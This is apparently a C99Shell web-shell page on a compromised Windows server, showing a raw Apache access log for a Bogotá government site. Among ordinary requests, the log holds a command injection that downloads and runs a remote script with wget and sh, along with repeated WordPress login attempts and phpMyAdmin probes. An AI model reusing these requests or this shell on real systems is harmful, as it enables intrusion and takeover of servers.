!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.09.24.log (585.08 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [24/Sep/2022:00:00:47 -0500] "HEAD / HTTP/1.1" 200 -
190.156.185.197 - - [24/Sep/2022:00:01:36 -0500] "GET /BLA/resoluciones/AUTOS%202022/4082.pdf HTTP/1.1" 200 354237
201.245.192.253 - - [24/Sep/2022:00:01:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:00:01:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:02:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [24/Sep/2022:00:05:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:00:06:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.25 - - [24/Sep/2022:00:07:34 -0500] "GET /bla/resoluciones/autos%202021/5778.pdf HTTP/1.1" 200 343364
172.22.2.4 - - [24/Sep/2022:00:09:10 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%203%20del%2027%20de%20Mayo%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [24/Sep/2022:00:07:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:08:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [24/Sep/2022:00:10:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:00:11:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.40 - - [24/Sep/2022:00:13:12 -0500] "GET /BLA/resoluciones/AUTOS%202022/4082.pdf HTTP/1.1" 200 354237
93.158.161.45 - - [24/Sep/2022:00:13:15 -0500] "-" 408 -
77.88.5.208 - - [24/Sep/2022:00:13:20 -0500] "-" 408 -
77.88.5.9 - - [24/Sep/2022:00:13:25 -0500] "-" 408 -
77.88.5.81 - - [24/Sep/2022:00:13:30 -0500] "-" 408 -
93.158.161.2 - - [24/Sep/2022:00:13:45 -0500] "-" 408 -
77.88.5.42 - - [24/Sep/2022:00:14:00 -0500] "-" 408 -
152.61.192.232 - - [24/Sep/2022:00:14:30 -0500] "GET / HTTP/1.1" 200 319
77.88.5.86 - - [24/Sep/2022:00:14:30 -0500] "-" 408 -
42.236.10.114 - - [24/Sep/2022:00:15:06 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Sep/2022:00:13:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.23 - - [24/Sep/2022:00:15:31 -0500] "-" 408 -
138.197.160.225 - - [24/Sep/2022:00:15:44 -0500] "\xb5Sn\xc5R\xd6\xe7\xa8dVr\x82\x1cG\xd1\x05\x90\xdb!\x90\xb0\xffc\x90" 501 953
138.197.160.225 - - [24/Sep/2022:00:15:45 -0500] "\x16\x03\x01" 400 226
138.197.160.225 - - [24/Sep/2022:00:15:45 -0500] "\x16\x03\x01" 400 226
138.197.160.225 - - [24/Sep/2022:00:15:46 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Sep/2022:00:15:47 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [24/Sep/2022:00:16:05 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%202%20del%2017%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 495382
172.22.2.4 - - [24/Sep/2022:00:14:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
77.88.5.246 - - [24/Sep/2022:00:16:31 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:16:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.213 - - [24/Sep/2022:00:17:48 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
207.46.13.213 - - [24/Sep/2022:00:17:58 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
77.88.5.41 - - [24/Sep/2022:00:18:31 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:19:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40883
152.61.128.50 - - [24/Sep/2022:00:19:15 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Sep/2022:00:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45151
209.141.44.191 - - [24/Sep/2022:00:20:05 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 1006
209.141.44.191 - - [24/Sep/2022:00:20:09 -0500] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 1165
216.245.221.92 - - [24/Sep/2022:00:20:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:19:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
93.158.161.56 - - [24/Sep/2022:00:21:31 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:21:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:00:20:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
74.82.47.35 - - [24/Sep/2022:00:24:24 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
185.119.81.102 - - [24/Sep/2022:00:24:44 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:00:24:45 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
87.236.176.205 - - [24/Sep/2022:00:24:54 -0500] "GET / HTTP/1.1" 200 319
87.236.176.196 - - [24/Sep/2022:00:24:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [24/Sep/2022:00:25:47 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.47 - - [24/Sep/2022:00:26:31 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:26:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:00:25:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:26:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [24/Sep/2022:00:29:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40883
201.245.192.253 - - [24/Sep/2022:00:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45151
216.245.221.92 - - [24/Sep/2022:00:30:47 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.200 - - [24/Sep/2022:00:31:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001793.tif HTTP/1.1" 200 213422
201.245.192.253 - - [24/Sep/2022:00:31:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [24/Sep/2022:00:32:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:00:32:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [24/Sep/2022:00:31:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.86 - - [24/Sep/2022:00:33:34 -0500] "GET /bla/resoluciones/autos%202021/5877.pdf HTTP/1.1" 200 382915
172.22.2.4 - - [24/Sep/2022:00:32:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:00:35:47 -0500] "HEAD / HTTP/1.1" 200 -
200.108.161.122 - - [24/Sep/2022:00:36:22 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Sep/2022:00:36:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
77.88.5.25 - - [24/Sep/2022:00:38:18 -0500] "-" 408 -
77.88.5.50 - - [24/Sep/2022:00:38:23 -0500] "-" 408 -
77.88.5.172 - - [24/Sep/2022:00:38:29 -0500] "-" 408 -
93.158.161.55 - - [24/Sep/2022:00:38:34 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:00:36:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.220 - - [24/Sep/2022:00:38:50 -0500] "-" 408 -
77.88.5.35 - - [24/Sep/2022:00:39:05 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40883
201.245.192.253 - - [24/Sep/2022:00:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45151
172.22.2.4 - - [24/Sep/2022:00:37:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
77.88.5.22 - - [24/Sep/2022:00:39:35 -0500] "-" 408 -
77.88.5.212 - - [24/Sep/2022:00:40:35 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:00:40:47 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.38 - - [24/Sep/2022:00:41:35 -0500] "-" 408 -
95.217.144.236 - - [24/Sep/2022:00:41:36 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:41:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:00:43:16 -0500] "-" 408 -
77.88.5.36 - - [24/Sep/2022:00:43:35 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:00:42:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:43:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [24/Sep/2022:00:45:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001765.tif HTTP/1.1" 200 169148
216.245.221.92 - - [24/Sep/2022:00:45:47 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.89 - - [24/Sep/2022:00:46:35 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:46:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:00:48:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Sep/2022:00:50:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:49:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
66.249.73.127 - - [24/Sep/2022:00:51:15 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:00:51:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:00:52:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [24/Sep/2022:00:54:10 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 200 3424865
216.245.221.92 - - [24/Sep/2022:00:55:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:00:54:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:00:56:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:00:56:54 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:00:55:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
207.46.13.40 - - [24/Sep/2022:00:59:14 -0500] "GET /bla/resoluciones/autos%202021/5580.pdf HTTP/1.1" 200 520280
152.61.192.232 - - [24/Sep/2022:01:00:44 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [24/Sep/2022:01:00:45 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [24/Sep/2022:01:00:46 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [24/Sep/2022:01:00:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:01:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:01:00:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:01:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
66.249.73.127 - - [24/Sep/2022:01:03:57 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:01:05:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:06:22 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Sep/2022:01:06:22 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
201.245.192.253 - - [24/Sep/2022:01:06:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
167.114.101.27 - - [24/Sep/2022:01:06:42 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 1152
172.22.2.4 - - [24/Sep/2022:01:06:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [24/Sep/2022:01:08:33 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [24/Sep/2022:01:08:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [24/Sep/2022:01:08:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [24/Sep/2022:01:07:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:01:10:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:11:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [24/Sep/2022:01:12:48 -0500] "GET /catalogoisis/js/criteriocombinada.js HTTP/1.1" 200 1843
172.22.2.4 - - [24/Sep/2022:01:11:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:12:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.127 - - [24/Sep/2022:01:14:48 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:01:15:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:16:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.200 - - [24/Sep/2022:01:16:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/1268.tif HTTP/1.1" 200 288792
207.46.13.40 - - [24/Sep/2022:01:18:41 -0500] "GET /bla/resoluciones/autos%202021/5783.pdf HTTP/1.1" 200 341552
217.182.175.162 - - [24/Sep/2022:01:18:47 -0500] "HEAD /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 -
51.15.164.30 - - [24/Sep/2022:01:18:47 -0500] "HEAD /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:19:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41029
201.245.192.253 - - [24/Sep/2022:01:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45136
172.22.2.4 - - [24/Sep/2022:01:17:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.25 - - [24/Sep/2022:01:19:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0753.pdf HTTP/1.1" 200 510227
157.55.39.200 - - [24/Sep/2022:01:19:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202650-2699.tif HTTP/1.1" 200 3086633
172.22.2.4 - - [24/Sep/2022:01:18:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:01:20:47 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.202 - - [24/Sep/2022:01:21:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001786.tif HTTP/1.1" 200 174974
201.245.192.253 - - [24/Sep/2022:01:21:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:01:22:47 -0500] "-" 408 -
185.108.164.168 - - [24/Sep/2022:01:24:05 -0500] "GET / HTTP/1.1" 200 319
207.46.13.86 - - [24/Sep/2022:01:24:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20700-749.tif HTTP/1.1" 200 4710687
172.22.2.4 - - [24/Sep/2022:01:23:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Sep/2022:01:25:47 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [24/Sep/2022:01:26:09 -0500] "GET /BLA/resoluciones/2002RES124.tif HTTP/1.1" 404 1018
172.22.2.4 - - [24/Sep/2022:01:24:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [24/Sep/2022:01:26:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
51.255.62.14 - - [24/Sep/2022:01:28:27 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
51.255.62.4 - - [24/Sep/2022:01:28:27 -0500] "GET /Autoliquidacion/ HTTP/1.1" 200 6629
66.249.73.127 - - [24/Sep/2022:01:28:56 -0500] "-" 408 -
51.255.62.10 - - [24/Sep/2022:01:28:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [24/Sep/2022:01:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41029
201.245.192.253 - - [24/Sep/2022:01:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45136
216.245.221.92 - - [24/Sep/2022:01:30:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:29:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:31:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [24/Sep/2022:01:31:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [24/Sep/2022:01:31:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [24/Sep/2022:01:30:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [24/Sep/2022:01:35:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:36:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:01:35:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:01:37:09 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:01:36:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
157.55.39.188 - - [24/Sep/2022:01:38:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 810955
201.245.192.253 - - [24/Sep/2022:01:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41029
201.245.192.253 - - [24/Sep/2022:01:39:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45136
69.171.251.118 - - [24/Sep/2022:01:39:49 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html?fbclid=IwAR0U8YrxxZ5l042DlLg-zJetR-mcdDNxaB9tKEyqhuiOCCq_y3Dpl8k_IUc HTTP/1.1" 200 1152
216.245.221.92 - - [24/Sep/2022:01:40:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:39:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
172.22.2.4 - - [24/Sep/2022:01:40:57 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [24/Sep/2022:01:41:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:01:41:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:42:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47823
5.181.80.58 - - [24/Sep/2022:01:43:54 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+79.110.62.227/lol.sh;sh+/tmp/lol.sh HTTP/1.1" 404 1013
35.204.49.24 - - [24/Sep/2022:01:43:58 -0500] "GET / HTTP/1.1" 200 319
35.204.49.24 - - [24/Sep/2022:01:43:58 -0500] "GET / HTTP/1.1" 200 4720
66.249.73.127 - - [24/Sep/2022:01:44:38 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:01:45:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:46:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:01:46:54 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
157.55.39.200 - - [24/Sep/2022:01:47:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0885.pdf HTTP/1.1" 200 356330
172.22.2.4 - - [24/Sep/2022:01:46:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:47:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [24/Sep/2022:01:50:47 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:01:51:10 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:01:51:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.202 - - [24/Sep/2022:01:52:53 -0500] "GET /BLA/resoluciones/00001786.tif HTTP/1.1" 404 1018
172.22.2.4 - - [24/Sep/2022:01:52:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:53:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [24/Sep/2022:01:55:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:01:56:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:01:56:51 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:01:58:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.188 - - [24/Sep/2022:02:00:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201751-1800/00001789.tif HTTP/1.1" 200 148760
216.245.221.92 - - [24/Sep/2022:02:00:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:01:59:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [24/Sep/2022:02:01:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:02:02:50 -0500] "-" 408 -
40.94.25.132 - - [24/Sep/2022:02:04:05 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 1152
157.55.39.202 - - [24/Sep/2022:02:04:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20850-899.tif HTTP/1.1" 200 6189794
216.245.221.92 - - [24/Sep/2022:02:05:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:04:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:06:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:02:05:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
192.241.220.127 - - [24/Sep/2022:02:09:15 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Sep/2022:02:10:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:11:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:02:10:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [24/Sep/2022:02:12:21 -0500] "-" 408 -
172.22.2.4 - - [24/Sep/2022:02:11:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [24/Sep/2022:02:15:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:16:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:02:16:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [24/Sep/2022:02:16:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.211 - - [24/Sep/2022:02:18:06 -0500] "GET /atencion-mujeres-que-reverdecen-ya-inicia-la-segunda-fase.html HTTP/1.1" 304 -
172.22.2.4 - - [24/Sep/2022:02:16:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [24/Sep/2022:02:19:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40600
201.245.192.253 - - [24/Sep/2022:02:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45134
66.249.73.127 - - [24/Sep/2022:02:20:24 -0500] "-" 408 -
216.245.221.92 - - [24/Sep/2022:02:20:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:21:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [24/Sep/2022:02:21:19 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2012%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
157.55.39.25 - - [24/Sep/2022:02:22:52 -0500] "GET /BLA/resoluciones/2002RES108.tif HTTP/1.1" 404 1018
172.22.2.4 - - [24/Sep/2022:02:21:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Sep/2022:02:22:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
54.188.219.147 - - [24/Sep/2022:02:24:37 -0500] "GET /dia-sin-carro-22-de-septiembre-2022-impacto-en-el-medioambiente.html HTTP/1.1" 200 823
216.245.221.92 - - [24/Sep/2022:02:25:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Sep/2022:02:26:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [24/Sep/2022:02:26:31 -0500] "-" 408 -
201.245.192.253 - - [24/Sep/2022:02:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40600
201.245.192.253 - - [24/Sep/2022:02:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45134
